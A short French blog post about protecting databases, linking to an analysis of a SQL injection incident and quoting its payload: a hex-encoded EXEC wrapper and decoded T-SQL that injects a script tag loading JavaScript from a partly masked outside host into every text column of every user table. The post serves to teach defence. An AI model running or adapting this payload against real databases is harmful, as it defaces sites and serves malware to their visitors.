Note
Access to this page requires authorization. You can try signing in or changing directories.
Access to this page requires authorization. You can try changing directories.
Pour mieux comprendre les risques auxquels sont exposées vos bases de données, il est intéressant de consacrer un peu de temps à l'étude des attaques et aux moyens à mettre en place pour s'en prémunir.
Vous trouverez sur ces liens une analyse des attaques récentes.
Anatomy of a SQL Injection Incident
Anatomy of a SQL Injection Incident, Part 2: Meat
En substance, cela ressemble à ca :
This looks a little complicated but, if we remove the encoding, we get this:
DECLARE @S NVARCHAR(4000);
SET @S=CAST(0x440045004300...7200 AS NVARCHAR(4000));
EXEC(@S);--
So, of course, the next question is "What is that string?" Here it is, with a bit of sanitization:
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=https://www.211796*.net/f****p.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
Comments
Anonymous
January 01, 2003
Pour faire suite à mon message du 19 mars " Se prémunir des attaques de type "SQLAnonymous
January 01, 2003
Suite aux récentes alertes de sécurité dont je m'étais fait l'écho ici et là